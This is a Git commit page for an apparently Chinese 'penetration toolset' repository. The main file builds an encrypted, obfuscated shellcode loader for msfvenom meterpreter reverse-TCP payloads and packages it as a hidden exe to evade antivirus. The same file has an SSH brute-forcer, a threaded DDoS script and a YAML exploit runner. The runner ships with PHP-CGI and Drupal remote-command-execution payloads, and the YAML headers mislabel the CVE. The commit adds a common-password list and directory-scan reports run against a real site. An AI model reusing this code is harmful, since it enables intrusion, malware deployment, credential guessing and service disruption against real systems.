pf4eg2w9n
/
fire_penetration
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

入口文件是penetration_toolset.py

Browse Source
main
UniDarkstars 7 months ago
parent 498f286140
commit 419187e52d
20 changed files with 31387 additions and 0 deletions
Show Stats Download Patch File Download Diff File

1
shellcode-loader/aes-xor.txt
Unescape View File

@ -0,0 +1 @@
Qylqa75C9Dg/HaeHynNvjg==

9468
shellcode-loader/dict.txt
View File

File diff suppressed because it is too large Load Diff

20
shellcode-loader/dict/a.txt
Unescape View File

@ -0,0 +1,20 @@
guidance
www.zip
!.gitignore
swagger-resources/conguraon/secut
FCKetor/etor/lemanager/browser/default/browser.html?Typemage&Connector=
FCKetor/etor/lemanager/browser/default/connectors/test.html
FCKetor/etor/lemanager/browser/default/browser.html?Typemage&Connector=connectors/jsp/connector
FCKetor/etor/lemanager/upload/test.html
FCKetor/etor/lemanager/connectors/test.html
FCKetor/etor/lemanager/connectors/uploadtest.html
dea/workspace.xml
system/user/stPage
user/st
system/user/stpage
v1/buness/mockData/getPreHostnfo
a/group
swagger
adn/pacsnterfacnfo
ureport/degner
wn-hostal-3.0/user/userst

9468
shellcode-loader/dict/dict.txt
View File

File diff suppressed because it is too large Load Diff

9356
shellcode-loader/dict/sensitive.txt
View File

File diff suppressed because it is too large Load Diff

2
shellcode-loader/main_result/main-mini.py
View File

File diff suppressed because one or more lines are too long

2
shellcode-loader/main_resultone.py
View File

File diff suppressed because one or more lines are too long

6
shellcode-loader/param.txt
Unescape View File

@ -0,0 +1,6 @@
id
name
user
info
date
query

100
shellcode-loader/password.txt
Unescape View File

@ -0,0 +1,100 @@
123456
a123456
123456a
521314
111111
woaini1314
qq123456
123123
000000
1qaz2wsx
1q2w3e4r
qwe123
7758521
123qwe
a123123
123456aa
woaini5
woaini
10020
13145
woaini123
123321
q123456
123456789
123456789a
5211314
asd123
a123456789
z123456
asd123456
a521314
aa123456
zhang123
aptx4869
123123a
1q2w3e4r5t
1qazxsw2
5 1314a
1q2w3e
aini1314
31415926
q1w2e3r4
123456qq
woaini521
1234qwer
a111111
5252222
iloveyou
abc123
110110
111111a
123456abc
w123456
7758258
123qweasd
159753
qwer1234
a000000
qq123123
zxc123
123654
abc123456
123456q
qq521314
12345678
000000a
456852
as123456
1314521
112233
521521
qazwsx123
zxc123456
abcd1234
asdasd
666666
love1314
QAZ123
aaa123
q1w2e3
aaaaaa
a123321
123000
11111111
12qwaszx
584521314
s123456
nihao123
caonima123
zxcvbnm123
wang123
159357
1A2B3C4D
asdasd123
5845
753951
147258
1123581321
1101
qq13145

541
shellcode-loader/penetration_toolset.py
Unescape View File

@ -0,0 +1,541 @@
from multiprocessing import Queue
import os
import subprocess
import random
import threading
import concurrent.futures
import time
import base64
import ctypes
import socket
import hashlib
import paramiko
from itertools import cycle
from Crypto.Cipher import AES
from typing import Any
try:
import yaml
except:
print("yaml库不存在正在安装...")
os.system('pip install pyyaml')
import yaml
try:
import fire
except ImportError:
print("fire库不存在正在安装...")
os.system("pip install fire")
try:
import requests
except ImportError:
print("requests库不存在正在安装...")
os.system("pip install requests")
class PingTool:
"""
基于 subprocess ping 命令或基于 TCP ping 命令
Args:
-u : ping 的目标
-t : ping 的类型icmp tcp
-p : TCP ping 的端口
python penetration_toolset.py PingTool -u 127.0.0.1 -t icmp
python penetration_toolset.py PingTool -u 127.0.0.1 -t tcp -p 80
"""
def __call__(self, url="", t="icmp", p=0):
self.url = url
self.ping_type = t
self.port = p
self.ping()
def ping(self):
try:
if self.ping_type.lower() == "icmp":
result = subprocess.run(['ping', self.url], capture_output=True, text=True)
print(result.stdout)
elif self.ping_type.lower() == "tcp":
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5) # 设置连接超时时间为5秒
if self.port == 0:
self.port = 80 # 设置默认端口号为80或者抛出异常提示用户设置端口号
try:
s.connect((self.url, self.port))
print(f"{self.url}:{self.port} is reachable.")
except (socket.error, socket.timeout) as e:
print(f"{self.url}:{self.port} is unreachable.")
finally:
s.close()
else:
print("Unsupported ping type. Please use 'icmp' or 'tcp'.")
except Exception as e:
print(f"An error occurred: {e}")
class searchpath():
"""
这是一个目录扫描命令
参数:
-u :url
指定扫描的ur1地址
-c :code
以列表方式指定所要选择的状态码默认所有状态码
-d :dictionary
指定扫描使用的字典默认为dict.txt字典
-r :report
指定保存的文件名默认为url.txt
python penetration_toolset.py searchpath -u www.baidu.com
"""
def __call__(self, url, code=[x for x in range(200, 600)], dictionary='dict.txt', report='./report/report.txt'):
# url地址检测
self.url = url
if url:
res = requests.get(self.url_check(url))
if res.status_code != 200:
print("url地址填写失败")
return
else:
self.url = self.url_check(url)
else:
self.url = None
#初始化默认值
self.dictionary = "./dict/" + dictionary
self.report = report
if self.report == "./report/report.txt":
if self.url[5] == 'http':
self.report = "./report/" + self.url[7:] + ".txt"
else:
self.report = "./report/" + self.url[8:] + ".txt"
else:
self.report = report
self.code = code
self.stitch(self.url_check(url))
#url检测
def url_check(self, url):
url = self.url
if url[:5] == 'https' or url[:5] == 'http:':
return url
else:
return "http://" + url
#文件保存
def writeurl(self, result):
try:
with open(self.report, 'a', encoding="UTF-8") as fp:
fp.write(result + '\n')
except FileNotFoundError:
print(self.report + "文件不存在!")
except IOError:
print(self.report + "文件读取错误!")
except Exception as e:
print(self.report + "其他异常:", str(e))
# 目录遍历
def stitch(self, url):
url = self.url
try:
with open(self.dictionary, 'r') as file:
for line in file:
final_url = url + "/" + line.strip()
res = requests.get(final_url)
if res.status_code in self.code:
print("[-]{:<30} 的状态码为:{:<200}".format(final_url, str(res.status_code)))
# print("[-]"+final_url+"的状态码为:"+str(res.status_code))
result = "[-]" + final_url + "的状态码为:" + str(res.status_code)
self.writeurl(result)
print("[*]" + self.dictionary[7:] + "的结果已保存至: " + self.report[8:])
except FileNotFoundError:
print(self.dictionary + "文件不存在!")
except IOError:
print(self.dictionary + "文件读取错误!")
except Exception as e:
print(self.dictionary + "其他异常:", str(e))
class encryption():
"""
该代码用于进一步混淆代码通过免杀
前期准备样例:
-生成shellcode: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw
-base64操作: base64 -w 0 -i rev.raw > rev.bs64
-获取payload: 即加密后字符串
-参数:
-p: payload:经过msfvenom生成的shellcode的base64加密字符
example:
python penetration_toolset.py encryption --payload='aaaapayload123'
'"""
def __call__(self, payload):
self.payload = payload
with open('./aes-xor.txt', 'w') as f:
f.write(self.aes_jiami(self.xor_jiami(self.payload, 35)))
# jiami_sc = self.aes_jiami(self.xor_jiami(self.payload,35))
# sc = self.xor_jiemi(self.aes_jiemi(jiami_sc),35)
# shde = base64.b64decode(sc)
# self.run(shde)
self.shell_write(self.aes_jiami(self.xor_jiami(self.payload, 35)))
self.min_code()
self.xor_code()
self.exe_file()
def add_to_16(self, s):
while len(s) % 16 != 0:
s += '\0'
return str.encode(s) # 返回bytes
def aes_jiami(self, text):
# 密钥长度必须为16、24或32位分别对应AES-128、AES-192和AES-256
key = 'LeslieCheungKwok'
aes = AES.new(self.add_to_16(key), AES.MODE_ECB)
encrypted_text = str(base64.encodebytes(aes.encrypt(self.add_to_16(text))), encoding='utf8').replace('\n', '')
return encrypted_text
def xor_jiami(self, s, key):
xor_s = ''
for i in s:
xor_s += chr(ord(i) ^ key)
return xor_s
#shellcode生成
def shell_write(self, payload):
payload = self.payload
str_payload = '''
import base64
import ctypes
from Crypto.Cipher import AES
kernel32 = ctypes.windll.kernel32
def aes_jiemi(s):
cipher = AES.new(b'LeslieCheungKwok', AES.MODE_ECB)
return cipher.decrypt(base64.decodebytes(bytes(s, encoding='utf8'))).rstrip(b'\\0').decode('utf8')
def xor_jiemi(s,key):
xor_s = ''
for i in s:
xor_s += chr(ord(i) ^ key)
return xor_s
def write_memory(buf):
length = len(buf)
kernel32.VirtualAlloc.restype = ctypes.c_void_p
ptr = kernel32.VirtualAlloc(None, length, 0x3000, 0x40)
kernel32.RtlMoveMemory.argtypes = (
ctypes.c_void_p,
ctypes.c_void_p,
ctypes.c_size_t)
kernel32.RtlMoveMemory(ptr, buf, length)
return ptr
def run(shellcode):
buf = ctypes.create_string_buffer(shellcode)
ptr = write_memory(buf)
shell_func = ctypes.cast(ptr, ctypes.CFUNCTYPE(None))
shell_func()
if __name__ == '__main__':
jiami_sc = '{}'
sc = xor_jiemi(aes_jiemi(jiami_sc),35)
shde = base64.b64decode(sc)
run(shde)
'''.format(payload)
with open('main_one.py', 'w', encoding='utf-8') as file:
file.write(str_payload)
#缩小python代码
def min_code(self):
print("[-] 正在缩小代码....")
time.sleep(1)
try:
os.system("pyminify main_one.py --output main-mini.py")
except:
print("[-] 该库不存在,正在安装....")
os.system("pip install python-minifier")
print("[-] 安装成功,正在执行缩小....")
try:
os.system("pyminify main_one.py --output main-mini.py")
#移动文件到“源目录”文件夹下
os.replace("main-mini.py", ".\源文件\main-mini.py")
except:
print("[-] 缩小失败,请检查代码")
# 对main_one.py进行混淆加密
def xor_code(self):
try:
if os.path.exists("Intensio-Obfuscator"):
print("[-] Intensio-Obfuscator工具库存在正在检测依赖....")
if os.system(" pip install -r Intensio-Obfuscator/requirements.txt") == 0:
print("[-] 依赖安装成功,正在执行混淆加密....")
os.system(
"python .\Intensio-Obfuscator\src\intensio_obfuscator\intensio_obfuscator.py -i .\源目录\ -o main_result -mlen lower -rts -ps -rth -ind 2")
print("[-] 结果已保存到main_result文件夹下")
print("[-] 正在删除过程文件....")
time.sleep(1)
os.remove("main_one.py")
os.remove("main-mini.py")
os.remove("aes-xor.txt")
print("[-] 过程文件删除成功")
else:
print("[-] 依赖安装失败,请检查网络")
return
except:
print("[-] Intensio-Obfuscator工具库不存在正在安装....")
try:
os.system("git clone https://github.com/Hnfull/Intensio-Obfuscator.git")
except:
print("[-] git clone失败请检查网络")
return
# 对main_one_obf.py进行打包为exe文件
def exe_file(self):
print("[-] 正在生成exe文件....")
time.sleep(1)
try:
os.system("copy ./main_result/main-mini.py ./main_resultone.py")
os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py")
except:
os.system("pip install pyinstaller")
print("[-] pyinstaller安装成功正在执行打包....")
os.system("copy ./main_result/main-mini.py ./main_resultone.py")
os.system(" pyinstaller.exe -Fw -i ./setting.ico main_resultone.py")
# print("[-] 已删除main_one_obf.py")
# os.remove("main_one_obf.py")
# os.remove(".\main_result.py")
os.remove(".\main_resultone.py")
print("[-] 打包成功请查看dist文件夹")
class SSHBruteForce:
"""
SSH Brute Force Attack
-U: 主机
-u: 用户名字典
-p: 密码字典
-P: SSH端口(默认22)
example:
python penetration_toolset.py SSHBruteForce -U 127.0.0.1 -P 22 -u <用户名字典路径> -p <密码字典路径>
ps 第一个是大写的U第二个参数是大写的P可不写
"""
def __call__(self, U_host, username_dict, password_dict, Port=22):
self.U_host = U_host
self.port = Port
self.username_dict = username_dict
self.password_dict = password_dict
self.ssh_attack()
def ssh_attack(self):
with open(self.username_dict, 'r') as users:
usernames = [line.strip() for line in users]
with open(self.password_dict, 'r') as passwords:
passwords = [line.strip() for line in passwords]
for username in usernames:
for password in passwords:
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(self.U_host, self.port, username, password)
print(f'Successful SSH connection to {self.U_host}:{self.port} with credentials {username}:{password}')
ssh.close()
except paramiko.AuthenticationException:
print(f'Failed to authenticate to {self.U_host}:{self.port} with credentials {username}:{password}')
except paramiko.SSHException as e:
print(f'SSH error on {self.U_host}:{self.port}: {str(e)}')
except socket.error as e:
print(f'Socket error on {self.U_host}:{self.port}: {str(e)}')
class DDOSAttack:
"""
基础的DDOS攻击脚本
-u : 指定url
-n : 线程数
-p : IP代理池格式为IP1,IP2,IP3
example:
python penetration_toolset.py DDOSAttack -u http://127.0.0.1 -n 3 -p "192.168.1.1,192.168.1.2,192.168.1.3"
"""
def __call__(self, url, num_threads, proxy_pool):
self.url = url
self.num_threads = num_threads
self.proxy_pool = proxy_pool.split(',') if proxy_pool else None
self.proxy_pool_iter = cycle(self.proxy_pool) if self.proxy_pool else None
self.attack()
def attack(self):
print(f"发起DDOS攻击目标{self.url},线程数:{self.num_threads}")
self.start_attack()
def start_attack(self):
def send_request():
proxies = {'http': next(self.proxy_pool_iter)} if self.proxy_pool else None
while True:
try:
requests.get(self.url, proxies=proxies)
except Exception as e:
print(f"An error occurred: {e}")
threads = []
for _ in range(self.num_threads):
t = threading.Thread(target=send_request)
threads.append(t)
t.start()
for t in threads:
t.join()
class Para_test():
"""
网站参数测试工具(get)
-u 指定url
-d 指定字典文件路径
example:
python penetration_toolset.py Para_test -u http://www.baidu.com -d ./param.txt
"""
def __call__(self, url, dictionary_path):
self.url = self.validate_url(url)
self.dictionary_path = dictionary_path
self.test_params()
@staticmethod
def validate_url(url):
"""确保URL具有有效的协议头"""
if not url.startswith(("http://", "https://")):
url = "http://" + url
return url
@staticmethod
def generate_content_hash(content):
"""生成页面内容的哈希值,用于比较内容变化"""
return hashlib.sha256(content.encode('utf-8')).hexdigest()
def test_params(self):
"""测试一组从文件读取的参数来猜测网站接受的参数"""
tested_params = {}
original_response = requests.get(self.url)
original_hash = self.generate_content_hash(original_response.text)
with open(self.dictionary_path, 'r', encoding='utf-8') as file:
for line in file:
param = line.strip()
test_url = f"{self.url}?{param}=testvalue"
response = requests.get(test_url)
response_hash = self.generate_content_hash(response.text)
if response_hash != original_hash:
tested_params[param] = "有效"
else:
tested_params[param] = "无效"
run_once = True
num = 0
for i in tested_params:
if tested_params[i] == "有效":
print(f"参数: {i}, 结果: {tested_params[i]}")
if run_once:
num = 1
run_once = False
if num == 0:
print("未发现有效参数")
class exploit(yaml.YAMLObject):
"""
用于定向的漏洞利用获取shell等操作具有可拓展型支持yaml配置文件编写poc进行定向攻击测试
参数:
-p:poc
指定使用的yaml文件
example:
python penetration_toolset.py exploit -p /test.yml -u 192.168.6.4
"""
data = {}
def __call__(self, poc, url, cmd=''):
self.poc = poc
self.url = url
self.cmd = cmd
if url:
res = requests.get(self.url_check(url))
if res.status_code != 200:
print("url地址填写失败")
return
else:
self.url = self.url_check(url)
else:
self.url = None
self.attack()
def url_check(self, url):
url = self.url
if url[:5] == 'https' or url[:5] == 'http:':
return url
else:
return "http://" + url
def check_file(self, file_path: str):
if not os.path.isfile(file_path):
return 0
def read_file(self, poc):
file_path = os.getcwd() + "\poc\\" + self.poc
if self.check_file(file_path) == 0:
print("该文件", file_path, "不存在")
else:
with open(file_path, "r", encoding="utf-8") as fp:
self.data = yaml.load(fp, Loader=yaml.FullLoader)
def attack(self):
url = self.url
self.read_file(self.poc)
data = self.data
param_url = data.get('poc_url')
param_Agent = data.get('User-Agent')
param_method = data.get('method')
param_cmd = data.get('cmd')
cmd = self.cmd
# print(param_url[0]['url'])
# print(param_Agent)
# print(param_method)
# print(os.getcwd()+"/poc/"+self.poc)
# print(param_method[1]['data'])
print("正在攻击...")
method = param_method[0]['method']
if method == 'GET':
res = requests.get(url=str(url) + param_url[0]["url"], headers=param_Agent[0])
if res.status_code != 200:
result = res.text
print(result)
else:
print("返回内容错误,状态码为:" + str(res.status_code))
elif method == 'POST':
if param_cmd[0]['cmd'] == 'yes':
string_with_format = str(param_method[1]['data']) % cmd
res = requests.post(url=str(url) + param_url[0]["url"], data=string_with_format, headers=param_Agent[0])
if res.status_code == 200:
result = res.text
print(result)
else:
print("返回内容错误,状态码为:" + str(res.status_code))
else:
print("cmd参数错误或不存在")
if __name__ == "__main__":
fire.Fire()

15
shellcode-loader/poc/CVE-2012-1823.yaml
Unescape View File

@ -0,0 +1,15 @@
# @name: exmple.yaml
# @Author: recyvan
# @Date: 2024-4-1
# @information: Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600
poc_url:
- url : /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
User-Agent:
- context: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
method:
- method: POST
- data: <?php echo shell_exec(%s); ?>
cmd:
- cmd: 'yes'

15
shellcode-loader/poc/text.yaml
Unescape View File

@ -0,0 +1,15 @@
# @name: exmple.yaml
# @Author: recyvan
# @Date: 2024-4-1
# @information: Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600
poc_url:
- url : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
User-Agent:
- context: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
method:
- method: POST
- data: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=
cmd:
- cmd: 'yes'

1639
shellcode-loader/report/res.txt
View File

File diff suppressed because it is too large Load Diff

0
shellcode-loader/report/test_super.py
Unescape View File

218
shellcode-loader/report/ww.baidu.com.txt
Unescape View File

@ -0,0 +1,218 @@
[-]http://www.baidu.com/wn-hostal-3.0/user/userst的状态码为404
[-]http://www.baidu.com/guidance的状态码为404
[-]http://www.baidu.com/www.zip的状态码为404
[-]http://www.baidu.com/!.gitignore的状态码为404
[-]http://www.baidu.com/swagger-resources/conguraon/secut的状态码为404
[-]http://www.baidu.com/FCKetor/etor/lemanager/browser/default/browser.html?Typemage&Connector=的状态码为404
[-]http://www.baidu.com/FCKetor/etor/lemanager/browser/default/connectors/test.html的状态码为404
[-]http://www.baidu.com/FCKetor/etor/lemanager/browser/default/browser.html?Typemage&Connector=connectors/jsp/connector的状态码为404
[-]http://www.baidu.com/FCKetor/etor/lemanager/upload/test.html的状态码为404
[-]http://www.baidu.com/FCKetor/etor/lemanager/connectors/test.html的状态码为404
[-]http://www.baidu.com/FCKetor/etor/lemanager/connectors/uploadtest.html的状态码为404
[-]http://www.baidu.com/dea/workspace.xml的状态码为404
[-]http://www.baidu.com/system/user/stPage的状态码为404
[-]http://www.baidu.com/user/st的状态码为404
[-]http://www.baidu.com/system/user/stpage的状态码为404
[-]http://www.baidu.com/v1/buness/mockData/getPreHostnfo的状态码为404
[-]http://www.baidu.com/a/group的状态码为404
[-]http://www.baidu.com/swagger的状态码为404
[-]http://www.baidu.com/adn/pacsnterfacnfo的状态码为404
[-]http://www.baidu.com/ureport/degner的状态码为404
[-]http://www.baidu.com/wn-hostal-3.0/user/userst的状态码为404
[-]http://www.baidu.com/booking/的状态码为404
[-]http://www.baidu.com/services/的状态码为404
[-]http://www.baidu.com/services的状态码为404
[-]http://www.baidu.com/weixin/的状态码为404
[-]http://www.baidu.com/study/的状态码为404
[-]http://www.baidu.com/pma的状态码为404
[-]http://www.baidu.com/soap的状态码为404
[-]http://www.baidu.com/nacos/的状态码为404
[-]http://www.baidu.com/nacos的状态码为404
[-]http://www.baidu.com/wsdl的状态码为404
[-]http://www.baidu.com/swagger的状态码为404
[-]http://www.baidu.com/api/swagger的状态码为404
[-]http://www.baidu.com/swagger/ui的状态码为404
[-]http://www.baidu.com/api/swagger/ui的状态码为404
[-]http://www.baidu.com/swagger-ui.html的状态码为404
[-]http://www.baidu.com/api/swagger-ui.html的状态码为404
[-]http://www.baidu.com/user/swagger-ui.html的状态码为404
[-]http://www.baidu.com/libs/swaggerui的状态码为404
[-]http://www.baidu.com/api/swaggerui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/ui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/security的状态码为404
[-]http://www.baidu.com/api-docs的状态码为404
[-]http://www.baidu.com/v2/api-docs的状态码为404
[-]http://www.baidu.com/v1/api-docs的状态码为404
[-]http://www.baidu.com/v3/api-docs的状态码为404
[-]http://www.baidu.com/swagger/docs/v1的状态码为404
[-]http://www.baidu.com/swagger/docs/v2的状态码为404
[-]http://www.baidu.com/swagger/docs/v3的状态码为404
[-]http://www.baidu.com/api.html的状态码为404
[-]http://www.baidu.com/sw/swagger-ui.html的状态码为404
[-]http://www.baidu.com/template/swagger-ui.html的状态码为404
[-]http://www.baidu.com/spring-security-rest/api/swagger-ui.html的状态码为404
[-]http://www.baidu.com/spring-security-oauth-resource/swagger-ui.html的状态码为404
[-]http://www.baidu.com/mappings的状态码为404
[-]http://www.baidu.com/actuator/mappings的状态码为404
[-]http://www.baidu.com/metrics的状态码为404
[-]http://www.baidu.com/actuator/metrics的状态码为404
[-]http://www.baidu.com/beans的状态码为404
[-]http://www.baidu.com/actuator/beans的状态码为404
[-]http://www.baidu.com/configprops的状态码为404
[-]http://www.baidu.com/actuator/configprops的状态码为404
[-]http://www.baidu.com/actuator的状态码为404
[-]http://www.baidu.com/auditevents的状态码为404
[-]http://www.baidu.com/autoconfig的状态码为502
[-]http://www.baidu.com/caches的状态码为404
[-]http://www.baidu.com/conditions的状态码为502
[-]http://www.baidu.com/docs的状态码为404
[-]http://www.baidu.com/dump的状态码为404
[-]http://www.baidu.com/env的状态码为404
[-]http://www.baidu.com/flyway的状态码为404
[-]http://www.baidu.com/health的状态码为404
[-]http://www.baidu.com/heapdump的状态码为404
[-]http://www.baidu.com/httptrace的状态码为404
[-]http://www.baidu.com/info的状态码为404
[-]http://www.baidu.com/intergrationgraph的状态码为404
[-]http://www.baidu.com/jolokia的状态码为404
[-]http://www.baidu.com/logfile的状态码为404
[-]http://www.baidu.com/loggers的状态码为404
[-]http://www.baidu.com/liquibase的状态码为404
[-]http://www.baidu.com/prometheus的状态码为502
[-]http://www.baidu.com/refresh的状态码为404
[-]http://www.baidu.com/scheduledtasks的状态码为404
[-]http://www.baidu.com/sessions的状态码为404
[-]http://www.baidu.com/shutdown的状态码为404
[-]http://www.baidu.com/trace的状态码为404
[-]http://www.baidu.com/threaddump的状态码为502
[-]http://www.baidu.com/actuator/auditevents的状态码为404
[-]http://www.baidu.com/actuator/health的状态码为404
[-]http://www.baidu.com/actuator/conditions的状态码为404
[-]http://www.baidu.com/actuator/env的状态码为404
[-]http://www.baidu.com/actuator/info的状态码为404
[-]http://www.baidu.com/actuator/loggers的状态码为404
[-]http://www.baidu.com/actuator/heapdump的状态码为404
[-]http://www.baidu.com/actuator/threaddump的状态码为404
[-]http://www.baidu.com/actuator/scheduledtasks的状态码为404
[-]http://www.baidu.com/actuator/httptrace的状态码为404
[-]http://www.baidu.com/actuator/jolokia的状态码为404
[-]http://www.baidu.com/actuator/hystrix.stream的状态码为404
[-]http://www.baidu.com/!.gitignore的状态码为404
[-]http://www.baidu.com/!.htaccess的状态码为404
[-]http://www.baidu.com/!.htpasswd的状态码为404
[-]http://www.baidu.com/%20../的状态码为404
[-]http://www.baidu.com/%2e%2e//google.com的状态码为404
[-]http://www.baidu.com/%3f/的状态码为404
[-]http://www.baidu.com/%EXT%的状态码为404
[-]http://www.baidu.com/%ext%.bak的状态码为404
[-]http://www.baidu.com/%ext%.old的状态码为404
[-]http://www.baidu.com/%ext%.php的状态码为200
[-]http://www.baidu.com/%ext%.tar的状态码为404
[-]http://www.baidu.com/%ext%.tgz的状态码为404
[-]http://www.baidu.com/%ext%.txt的状态码为404
[-]http://www.baidu.com/%ext%.zip的状态码为404
[-]http://www.baidu.com/%ff的状态码为404
[-]http://www.baidu.com/..;/的状态码为404
[-]http://www.baidu.com/.FBCIndex的状态码为404
[-]http://www.baidu.com/.ICEauthority的状态码为404
[-]http://www.baidu.com/.JustCode的状态码为404
[-]http://www.baidu.com/.LICENSE.bud的状态码为404
[-]http://www.baidu.com/.LSOverride的状态码为404
[-]http://www.baidu.com/.Python的状态码为404
[-]http://www.baidu.com/.RData的状态码为404
[-]http://www.baidu.com/.README.md.bud的状态码为404
[-]http://www.baidu.com/booking/的状态码为404
[-]http://www.baidu.com/services/的状态码为404
[-]http://www.baidu.com/services的状态码为404
[-]http://www.baidu.com/weixin/的状态码为404
[-]http://www.baidu.com/study/的状态码为404
[-]http://www.baidu.com/pma的状态码为404
[-]http://www.baidu.com/soap的状态码为404
[-]http://www.baidu.com/nacos/的状态码为404
[-]http://www.baidu.com/nacos的状态码为404
[-]http://www.baidu.com/wsdl的状态码为404
[-]http://www.baidu.com/swagger的状态码为404
[-]http://www.baidu.com/api/swagger的状态码为404
[-]http://www.baidu.com/swagger/ui的状态码为404
[-]http://www.baidu.com/api/swagger/ui的状态码为404
[-]http://www.baidu.com/swagger-ui.html的状态码为404
[-]http://www.baidu.com/api/swagger-ui.html的状态码为404
[-]http://www.baidu.com/user/swagger-ui.html的状态码为404
[-]http://www.baidu.com/libs/swaggerui的状态码为404
[-]http://www.baidu.com/api/swaggerui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/ui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/security的状态码为404
[-]http://www.baidu.com/api-docs的状态码为404
[-]http://www.baidu.com/v2/api-docs的状态码为404
[-]http://www.baidu.com/v1/api-docs的状态码为404
[-]http://www.baidu.com/v3/api-docs的状态码为404
[-]http://www.baidu.com/swagger/docs/v1的状态码为404
[-]http://www.baidu.com/swagger/docs/v2的状态码为404
[-]http://www.baidu.com/swagger/docs/v3的状态码为404
[-]http://www.baidu.com/api.html的状态码为404
[-]http://www.baidu.com/sw/swagger-ui.html的状态码为404
[-]http://www.baidu.com/template/swagger-ui.html的状态码为404
[-]http://www.baidu.com/spring-security-rest/api/swagger-ui.html的状态码为404
[-]http://www.baidu.com/spring-security-oauth-resource/swagger-ui.html的状态码为404
[-]http://www.baidu.com/mappings的状态码为404
[-]http://www.baidu.com/actuator/mappings的状态码为404
[-]http://www.baidu.com/metrics的状态码为404
[-]http://www.baidu.com/actuator/metrics的状态码为404
[-]http://www.baidu.com/beans的状态码为404
[-]http://www.baidu.com/actuator/beans的状态码为404
[-]http://www.baidu.com/configprops的状态码为404
[-]http://www.baidu.com/actuator/configprops的状态码为404
[-]http://www.baidu.com/actuator的状态码为404
[-]http://www.baidu.com/auditevents的状态码为404
[-]http://www.baidu.com/booking/的状态码为404
[-]http://www.baidu.com/services/的状态码为404
[-]http://www.baidu.com/services的状态码为404
[-]http://www.baidu.com/weixin/的状态码为404
[-]http://www.baidu.com/study/的状态码为404
[-]http://www.baidu.com/pma的状态码为404
[-]http://www.baidu.com/soap的状态码为404
[-]http://www.baidu.com/nacos/的状态码为404
[-]http://www.baidu.com/nacos的状态码为404
[-]http://www.baidu.com/wsdl的状态码为404
[-]http://www.baidu.com/swagger的状态码为404
[-]http://www.baidu.com/api/swagger的状态码为404
[-]http://www.baidu.com/swagger/ui的状态码为404
[-]http://www.baidu.com/api/swagger/ui的状态码为404
[-]http://www.baidu.com/swagger-ui.html的状态码为404
[-]http://www.baidu.com/api/swagger-ui.html的状态码为404
[-]http://www.baidu.com/user/swagger-ui.html的状态码为404
[-]http://www.baidu.com/libs/swaggerui的状态码为404
[-]http://www.baidu.com/api/swaggerui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/ui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/security的状态码为404
[-]http://www.baidu.com/api-docs的状态码为404
[-]http://www.baidu.com/v2/api-docs的状态码为404
[-]http://www.baidu.com/v1/api-docs的状态码为404
[-]http://www.baidu.com/v3/api-docs的状态码为404
[-]http://www.baidu.com/swagger/docs/v1的状态码为404
[-]http://www.baidu.com/swagger/docs/v2的状态码为404
[-]http://www.baidu.com/swagger/docs/v3的状态码为404
[-]http://www.baidu.com/api.html的状态码为404
[-]http://www.baidu.com/sw/swagger-ui.html的状态码为404
[-]http://www.baidu.com/template/swagger-ui.html的状态码为404
[-]http://www.baidu.com/booking/的状态码为404
[-]http://www.baidu.com/services/的状态码为404
[-]http://www.baidu.com/services的状态码为404
[-]http://www.baidu.com/weixin/的状态码为404
[-]http://www.baidu.com/study/的状态码为404
[-]http://www.baidu.com/pma的状态码为404
[-]http://www.baidu.com/soap的状态码为404
[-]http://www.baidu.com/nacos/的状态码为404
[-]http://www.baidu.com/nacos的状态码为404
[-]http://www.baidu.com/wsdl的状态码为404
[-]http://www.baidu.com/swagger的状态码为404
[-]http://www.baidu.com/api/swagger的状态码为404
[-]http://www.baidu.com/swagger/ui的状态码为404
[-]http://www.baidu.com/api/swagger/ui的状态码为404
[-]http://www.baidu.com/swagger-ui.html的状态码为404
[-]http://www.baidu.com/api/swagger-ui.html的状态码为404
[-]http://www.baidu.com/user/swagger-ui.html的状态码为404
[-]http://www.baidu.com/libs/swaggerui的状态码为404
[-]http://www.baidu.com/api/swaggerui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/ui的状态码为404
[-]http://www.baidu.com/swagger-resources/configuration/security的状态码为404

48
shellcode-loader/result.txt
Unescape View File

@ -0,0 +1,48 @@
[-]http://example.com/metrics的状态码为404
[-]http://baidu.com/booking/的状态码为200
[-]http://baidu.com/services/的状态码为200
[-]http://baidu.com/weixin/的状态码为200
[-]http://baidu.com/study/的状态码为200
[-]http://baidu.com/pma的状态码为200
[-]http://baidu.com/soap的状态码为200
[-]http://baidu.com/nacos的状态码为200
[-]http://baidu.com/wsdl的状态码为200
[-]http://baidu.com/swagger的状态码为200
[-]http://baidu.com/swagger/ui的状态码为200
[-]http://baidu.com/api/swagger/ui的状态码为200
[-]http://baidu.com/swagger-ui.html的状态码为200
[-]http://baidu.com/user/swagger-ui.html的状态码为200
[-]http://baidu.com/libs/swaggerui的状态码为200
[-]http://baidu.com/api/swaggerui的状态码为200
[-]http://baidu.com/swagger-resources/configuration/ui的状态码为200
[-]http://baidu.com/swagger-resources/configuration/security的状态码为200
[-]http://baidu.com/api-docs的状态码为200
[-]http://baidu.com/v2/api-docs的状态码为200
[-]http://baidu.com/v1/api-docs的状态码为200
[-]http://baidu.com/v3/api-docs的状态码为200
[-]http://baidu.com/swagger/docs/v1的状态码为200
[-]http://baidu.com/swagger/docs/v2的状态码为200
